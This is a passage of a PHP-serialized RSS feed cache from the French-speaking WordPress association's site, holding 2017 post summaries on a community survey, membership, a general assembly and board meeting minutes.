Francophone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:11:\"communauté\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:7:\"sondage\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1647338\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1513:\"Fin mai, un grand sondage était lancé par Maxime Bernard-Jacquet au nom de la communauté francophone de WordPress afin de mieux identifier comment elle se composait ! Aujourd&#8217;hui les résultats sont disponibles. La première statistique intéressante est la participation, puisque ce sont 1000 personnes qui ont répondues à ce questionnaire. Ceci permet donc d&#8217;avoir des<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=_z7qQytCHB8:88mzRUJSvF0:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=_z7qQytCHB8:88mzRUJSvF0:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=_z7qQytCHB8:88mzRUJSvF0:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=_z7qQytCHB8:88mzRUJSvF0:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=_z7qQytCHB8:88mzRUJSvF0:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=_z7qQytCHB8:88mzRUJSvF0:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/_z7qQytCHB8\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Benoît Catherineau\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"https://wpfr.net/resultats-grand-sondage-de-communaute-francophone-de-wordpress/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"https://wpfr.net/resultats-grand-sondage-de-communaute-francophone-de-wordpress/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"Cap des 200 adhérents WPFR franchi !\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/dZ9emWhTWPc/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"https://wpfr.net/cap-200-adherents-wpfr-franchi/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 13 Jun 2017 15:16:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:16:\"Association WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1642124\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1476:\"C&#8217;est officiel, l&#8217;association WordPress Francophone compte 200 membres à jour de cotisation ! Ouvertes depuis septembre 2016, les adhésions en ligne remportent un vif succès et nous sommes heureux de voir que la communauté WordPress se porte bien. On se donne rendez-vous à Paris pour le WordCamp Europe du 16 et 17 juin prochain. Le<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=dZ9emWhTWPc:XRx8AZKI2zs:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=dZ9emWhTWPc:XRx8AZKI2zs:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=dZ9emWhTWPc:XRx8AZKI2zs:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=dZ9emWhTWPc:XRx8AZKI2zs:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=dZ9emWhTWPc:XRx8AZKI2zs:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=dZ9emWhTWPc:XRx8AZKI2zs:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/dZ9emWhTWPc\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Aurélien Denis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wpfr.net/cap-200-adherents-wpfr-franchi/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"5\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wpfr.net/cap-200-adherents-wpfr-franchi/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"Annonce de la prochaine Assemblée Générale du 12/12\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/g8Lqzfsj1e0/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://wpfr.net/annonce-prochaine-assemblee-generale-12-12/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 04 Dec 2017 19:28:02 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:16:\"Association WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1641226\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1521:\"Cher membre, Nous vous serions très obligés de bien vouloir assister à l’Assemblée Générale annuelle de l’association WordPress Francophone qui aura lieu mardi 12 décembre 2017, à 20 h 00. Cette assemblée générale se déroulera en direct sur YouTube par l’intermédiaire de l’application Google Hangout visible ici-même : L’ordre du jour abordé sera le suivant : Rapport<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=g8Lqzfsj1e0:6ZmWJIqm-Bg:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=g8Lqzfsj1e0:6ZmWJIqm-Bg:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=g8Lqzfsj1e0:6ZmWJIqm-Bg:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=g8Lqzfsj1e0:6ZmWJIqm-Bg:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=g8Lqzfsj1e0:6ZmWJIqm-Bg:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=g8Lqzfsj1e0:6ZmWJIqm-Bg:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/g8Lqzfsj1e0\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Aurélien Denis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"https://wpfr.net/annonce-prochaine-assemblee-generale-12-12/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wpfr.net/annonce-prochaine-assemblee-generale-12-12/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"Un grand sondage pour mieux connaître la communauté\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/ArHvRJvd55Y/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wpfr.net/grand-sondage-mieux-connaitre-communaute/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 23 May 2017 14:15:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:21:\"WordPress Francophone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"communauté\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1638548\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1516:\"Maxime et Alexandre, les « chefs cuistot » de la communauté viennent de lancer un sondage à destination de la communauté francophone de WordPress. L&#8217;objectif est de mieux connaitre celles et ceux qui la composent. Alors que vous soyez débutant ou confirmé, simple utilisateur, bidouilleur passionné ou professionnel venez répondre à ce questionnaire qui permettra de mieux<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=ArHvRJvd55Y:rW_1swugq14:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=ArHvRJvd55Y:rW_1swugq14:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=ArHvRJvd55Y:rW_1swugq14:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=ArHvRJvd55Y:rW_1swugq14:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=ArHvRJvd55Y:rW_1swugq14:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=ArHvRJvd55Y:rW_1swugq14:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/ArHvRJvd55Y\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Benoît Catherineau\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:63:\"https://wpfr.net/grand-sondage-mieux-connaitre-communaute/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://wpfr.net/grand-sondage-mieux-connaitre-communaute/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:42:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"Compte rendu de la réunion du bureau du 9 mars 2017\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/scUWeRFptEQ/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://wpfr.net/compte-rendu-reunion-bureau-9-mars-2017/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 03 Apr 2017 09:02:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:16:\"Association WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:21:\"WordPress Francophone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:8:\"Réunion\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1629790\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1529:\"Présent : Willy Bahuaud, Xavier, Borderie, Benoît Catherineau et Aurélien Denis L’élection du nouveau bureau a été clôturée le 4 mars 2017. Le résultat donne vainqueur les 3 candidats suivants : Benoît Catherineau, Xavier Borderie, Aurélien Denis. Cette réunion a pour objet l’installation du nouveau bureau de WPFR. L’ordre du jour Répartition des postes de Président, Secrétaire<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=scUWeRFptEQ:5gEow5Kjbq4:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=scUWeRFptEQ:5gEow5Kjbq4:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=scUWeRFptEQ:5gEow5Kjbq4:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=scUWeRFptEQ:5gEow5Kjbq4:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=scUWeRFptEQ:5gEow5Kjbq4:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=scUWeRFptEQ:5gEow5Kjbq4:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/scUWeRFptEQ\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Benoît Catherineau\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"https://wpfr.net/compte-rendu-reunion-bureau-9-mars-2017/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"9\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"https://wpfr.net/compte-rendu-reunion-bureau-9-mars-2017/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"hourly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:2:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";s:4:\"href\";s:48:\"http://feeds.feedburner.com/WordpressFrancophone\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:3:\"rel\";s:3:\"hub\";s:4:\"href\";s:32:\"http://pubsubhubbub.appspot.com/\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:4:{s:4:\"info\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:3:\"uri\";s:20:\"wordpressfrancophone\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:14:\"emailServiceId\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordpressFrancophone\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:18:\"feedburnerHostname\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://feedburner.google.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"feedFlare\";a:9:{i:0;a:5:{s:4:\